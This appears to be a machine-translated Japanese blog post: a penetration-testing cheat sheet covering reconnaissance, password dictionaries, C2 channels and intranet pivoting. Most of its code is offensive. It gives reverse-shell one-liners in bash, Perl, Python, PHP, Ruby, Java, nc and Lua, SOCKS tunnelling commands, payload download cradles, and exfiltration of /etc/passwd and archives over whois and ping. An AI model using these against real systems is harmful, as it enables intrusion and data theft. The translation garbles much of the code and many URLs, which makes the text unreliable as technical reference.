Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863101624

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

情報収集

オープンソースインテリジェンス情報コレクション(OSINT)

github

github_nuggests(githubに漏れた敏感な情報を自動的にクロールする):https://github.com/az0ne/github_nuggests

GSIL(15分以内に)ほぼリアルタイムでGitHubでリークされた情報を発見することができます:https://GITHUB.COM/FEEICN/GSIL

X-Patrol(Xiaomiチームの):3359GITHUB.com/misecurity/x-patrol

whois query/register counter-ceck/emailカウンターチェック/関連資産

Webmaster's Home :http://whois.chinaz.com/?domainname=target.comws=

ラブステーション:https://whois.aizhan.com/target.com/

Weibu Online :https://X.Threatbook.cn/

IP Counter-Check:https://dns.aizhan.com/

Tianyancha :https://www.tianyancha.com/

Tiger Mom Check :http://ww.whomx.com/

歴史的脆弱性クエリ:オンラインクエリ:http://wy.zone.ci/

自己構築:https://github.com/hanc00l/wooyun_publi/

Googleハッキング

エンタープライズパスワード辞書を作成

辞書リスト

PasswordList:3359Github.com/lavalamp-/password-lists

Pigman Dictionary :https://pan.baidu.com/s/1dfjyedzblasting_dictionary(弱いパスワード、一般的に使用されるパスワード、ディレクトリブラスト、データベースブラスト、編集者ブラスト、背景爆破などを含むさまざまな辞書を共有および収集します。

特定のメーカーの場合、メーカー関連のドメイン名の辞書の構築に焦点を当てています

['%PWD%123'、 '%user%123'、 '%user%521'、 '%user%2017'、 '%pwd%321'、 '%pwd%521'、 '%user%321'、 '%pwd%123!'、 '%pwd%1 23!@# '、'%PWD%1234 '、'%user%2016 '、'%user%123 $%^'、'%user%123!@# '、'%pwd%2016 '、'%pwd%2017 '、'%pwd%1! '、'%pwd%2 @'、'%PWD%3# '、'%PWD%123#@! '、'%PWD%12345 '、'%PWD%123 $%^'、'%PWD% 56 '、'%user%123#@! '、'%user%

パスワード生成

GenPass(漢字を備えた弱いパスワードジェネレーター:33https://GITHUB.COM/RICTERZ/GENPASS/

Passmaker(ルールをカスタマイズできるパスワード辞書ジェネレーター):https://github.com/bit4woo/passmaker

pydictor(強力なパスワードジェネレーター):https://github.com/landgrey/pydictor

メーリングリストGet

TheHarvester:https://github.com/laramies/theharvester

メールアドレスを取得し、アドレス帳をエクスポートします

LinkedInt :https://github.com/mdsecactivebreach/linkedint

Mailet:https://github.com/ridter/mailget

リークパスワードクエリ

ghostproject:3359ghostproject.fr/

pwndb:https://pwndb2am4tzkvold.onion.to/

エンタープライズ外の関連情報のコレクション

サブドメイン名取得

レイヤーサブドメイン掘削機4.2記念バージョン

subdomainsbrute:https://github.com/lijiejie/subdomainsbrute

wydomain:https://github.com/ring04h/wydomain

sublist3r:https://github.com/aboul3la/sublist3r

site:target.com:https://www.google.com

GitHubコードリポジトリ

パケットキャプチャ分析リクエストリクターズ返品値(ジャンプ/ファイルアップロード/APP/APIインターフェイスなど)

Webmasterヘルパーリンクおよびその他のオンライン検索Webサイト

ドメイン送信の脆弱性

Linux

dig @ns.example.com example=.com axfr

Windows

nslookup -type=ns xxx.yyy.cn #queryドメイン名を解決するDNSサーバー

nslookup #enter nslookupインタラクティブモード

サーバーdns.domian.com #pecify dns server

LS XXX.YYY.CN #LISTドメイン情報

getDomainsByssl.py :3359Note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b1222222222222222222222222222222222222222222222222222222

censys.io証明書:https://censys.io/certificates?q=target.com

CRT.SH証明書クエリ3:3359CRT.SH/?Q=%25.Target.com

Shadon :https://www.shodan.io/

Zoomeye :https://www.zoomeyee.org/

FOFA :https://FOFA.SO/

Censys:https://Censys.io/

dnsdb.io :3359dnsdb.io/zh-cn/search?q=target.com

api.hackertarget.com :3358api.hackertarget.com/reversedns/?q=target.com

community.riskiq.com :3359Community.riskiq.com/search/target.com

subdomain3 :https://github.com/yanxiu0614/subdomain3

Fuzzdomain :https://github.com/chora10/fuzzdomain

dnsdumpster.com :3359dnsdumpster.com/

phpinfo.me :3359phpinfo.me/domain/

DNS Open Data Interface :https://DNS.BUFFEROVER.RUN/DNS?Q=BAIDU.com

イントラネット

を入力します

エンタープライズの弱いアカウントの抜け穴に基づいて

VPN(電子メール、パスワードブラスト、ソーシャルワーカーなどを介してVPNを取得)

エンタープライズ関連の運用およびメンテナンスシステム(Zabbixなど)

システムの脆弱性に基づいて入力

Metasploit(脆弱性エクスプロイトフレームワーク):3359Github.com/rapid7/Metasploit-framework

スクリプトを悪用します

ウェブサイトのアプリケーションの普及

SQL注入

クロスサイトスクリプト(XSS)

クロスサイトリクエスト偽造(CSRF)

ssrf(ssrf_proxy)

機能/ビジネスロジックの脆弱性

その他の脆弱性など

CMSコンテンツ管理システムの脆弱性

エンタープライズセルフビルドエージェント

ワイヤレスWi-Fiアクセス

シーン攻撃

コマンドとコントロール

ICMP :3359Pentestlab.blog/2017/07/28/Command-and-Control-icmp/

DNS :https://Pentestlab.blog/2017/09/06/command-and-control-dns/

Dropbox :https://Pentestlab.blog/2017/08/29/command-and-control-dropbox/

gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/

Telegram :http://drops.xmd5.com/static/drops/tips-16142.html

Twitter :https://Pentestlab.blog/2017/09/26/command-and-control-twitter/

ウェブサイトキーワード:https://Pentestlab.blog/2017/09/14/command-and-control-website-keyword/

Powershell :https://Pentestlab.blog/2017/08/19/command-and-control-powershell/

Windows com :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/

webdav :https://pentestlab.blog/2017/09/12/command-and-control-webdav/

Office 365 :https://www.anquanke.com/post/id/86974

https :https://pentestlab.blog/2017/10/04/command-and-control-https/

Kernel :https://Pentestlab.blog/2017/10/02/command-and-control-kernel/

ウェブサイト:https://Pentestlab.blog/2017/11/14/command-and-control-website/

WMI :https://Pentestlab.blog/2017/11/20/command-and-control-wmi/

WebSocket :https://Pentestlab.blog/2017/12/06/command-and-control-websocket/

画像:https://Pentestlab.blog/2018/01/02/command-and-control-images/

Webインターフェイス:https://Pentestlab.blog/2018/01/03/command-and-control-web-interface/

JavaScript :https://Pentestlab.blog/2018/01/08/command-and-control-javascript/

.

フロンティング

ドメインフロンティング

tor_fronting。

エージェント

VPN

http :http://cn-proxy.com/

トル

インターネットクロスボーダーアプリケーション

イントラネットクロスボーダー転送

NCポート転送

LCXポート転送

NP

プロキシスクリプトTunna

reduh

.

イントラネットクロスボーダープロキシ浸透

ew

フォワードソックスV5サーバー:

./ew -s ssocksd -l 1080

リバウンドソックスV5サーバー:A)最初に、パブリックネットワークIPを使用してホストAで次のコマンドを実行します。

$ ./ew -s rcsocks -l 1080 -e 8888

b)ターゲットホストBで靴下V5サービスを開始し、パブリックホストのポート8888にバウンスします

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

マルチレベルのカスケード

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

LCX_TRANの使用

$ ./EW -S SSOCKSD -L 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

LCX_LISTENとLCX_SLAVEの使用

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./EW -S SSOCKSD -L 9999

$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999

参照のために「3レベルのカスケード」ローカルソックステストケース

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777

シロアリ

use :3https://rootkiter.com/termite/readme.txtの手順

プロキシスクリプト

Regeorg :3359github.com/sensepost/regeorg

シェルリバウンド

bash

bash -i /dev/tcp/10.0.0.1/8080 01

Perl

perl -e '使用socket; $ i='10 .0.0.1 '; $ p=1234; socket(s、pf_inet、sock_stream、getprotobyname(' tcp ')); if(connect(s、 sockaddr_in($ p、inet_aton($ i)))){open(stdin、 's'); open(stdout、 's'); open(stderr、 's'); exec( '/bin/sh -私');};'

Python

python -c 'インポートソケット、サブプロセス、OS; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '10.0.0.1'、1234)); o s.dup2(s.fileno()、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); p=subprocess.call(['/bin/sh' '、' -i '];'

Php

php -r '$ sock=fsocopen('10 .0.0.1'、1234); exec( '/bin/sh -i 3 3 23'); '

ルビー

ruby -rsocket -e'f=tcpsocket.open('10 .0.0.1 '、1234).to_i; exec sprintf('/bin/sh -i%d%d 2%d '、f、f、f)'

Java

r=runtime.getRuntime()

p=r.exec(['/bin/bash'、 '-c'、 'exec 5/dev/tcp/10.0.0.1/2002; cat 5 | while read line; do \ $ line 25 5; done'] string []))

p.waitfor()

NC

#use-e

NC -E /BIN /SH 223.8.200.234 1234

#not used-e

mknod /tmp /backpipe p

/bin/sh 0/tmp/backpipe | NC AttacherIPリスニングポート1/TMP/バックパイプ

ルア

lua -e 'require(' socket '); require(' os '); t=socket.tcp(); t:connect(' 202.103.243.122 '、' 1234 '); os.execute('/bin/sh -i 3 3 23 ');'

イントラネットファイルの転送およびダウンロード

WPUT

wput dir_name ftp://linuxpig:123456@host.com/

wget

wget http://site.com/1.rar -o 1.rar

ARIAC2(インストールする必要があります)

aria2c -o owncloud.zip 3https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

Powershell

$ p=new-Object System.net.webclient

$ P.DownLoadFile( 'http://Domain/file'、 'c:%homepath%file')

VBSスクリプト

args=wscript.argumentsを設定します

url='http://domain/file'

dim xhttp: set xhttp=createObject( 'microsoft.xmlhttp')

dim bstrm: set bstrm=createObject( 'adodb.stream')

xhttp.open 'get'、url、false

xhttp.send

BSTRMで

.type=1 '。開ける。xhttp.responsebodyを作成します

.savetofile 'c: \%homepath%\ file'、2 '

で終わります

実行:cscript test.vbs

Perl

#!/usr/bin/perl

lwp:simpleを使用します。

getStore( 'http://domain/file'、 'file');

実行:perl test.pl

Python

#!/usr/bin/python

urllib2をインポートします

u=urllib2.urlopen( 'http://domain/file')

localfile=open( 'local_file'、 'w')

localfile.write(u.read())

localfile.close()

実行:python test.py

ルビー

#!/usr/bin/ruby

「net/http」が必要です

net:http.start( 'www.domain.com'){| http |

r=http.get( '/file')

open( 'Save_Location'、 'wb'){| file |

file.write(r.body)

}

}

実行:Ruby test.rb

Php

?php

$ url='http://ww.example.com/file';

$ path='/path/to/file';

$ ch=curl_init($ url);

curl_setopt($ ch、curlopt_returntransfer、true);

$ data=curl_exec($ ch);

curl_close($ ch);

file_put_contents($ path、$ data);

実行:php test.php

ncattacker

CATファイル| NC -L 1234

ターゲット

NC HOST_IP 1234ファイル

FTP

FTP 127.0.0.1ユーザー名パスワードファイル終了を取得します

TFTP

TFTP -IホストGET C:%HOMEPATH%FILE LOCATION_OF_FILE_ON_TFTP_SERVER

bitsadmin

bitsadmin /転送n http://domain /file c:%homepath%file

ウィンドウファイル共有

正味使用x: \ 127.0.0.1 \ share /user:example.comuserid mypassword

SCPローカルからリモート

SCPファイルuser@host.com:/TMP

リモートからローカル

scp user@host.com:/TMPファイル

rsyncリモートrsyncサーバーからローカルマシンにファイルをコピーする

rsync -av root@192.168.78.192:3360ww /databack

ローカルマシンからリモートRSYNCサーバーにファイルをコピーする

rsync -av /databack root@192.168.78.192:3360www

certutil.exe

certutil.exe -urlcache -split -f http://site.com/file

コピー

コピー\\ ip \ sharename \ file.exe file.exe

WHOISレシーバーホストB:

NC -VLNP 1337 | SED 's///g' | base64 -d

送信者ホストA:

whois -h host_ip -p 1337 `cat /etc /passwd | base64`

WHOIS + TARFIRST:

ncat -k -l -p 4444 |ティーファイル。b64#teeファイルに、それが確実に持っていることを確認できるようにする

TAR CZF - /TMP /* | base64 | xargs -iビットタイムアウト0.03 whois -h host_ip -p 4444ビット

ついに

cat files.b64 | tr -d '\ r \ n' | base64 -d | tar zxv#ファイルを出力します

Ping送信終了:

xxd -p -c 4 Secret.txt |読み取りライン。 ping -c 1 -p $ line ipを行います。終わり

受信者ping_receiver.py:

sysをインポートします

try:

scapy.allからimport *

:を除く

印刷( 'SCAPYが見つかりません、SCAPY: PIPインストールSCAPY'をインストールしてください ')

sys.exit(0)

def process_packet(pkt):

pkt.haslayer(ICMP):の場合

pkt [icmp] .type==8:の場合

data=pkt [icmp] .load [-4:]

print(f '{data.decode(' utf-8 ')}'、flush=true、end=''、sep='')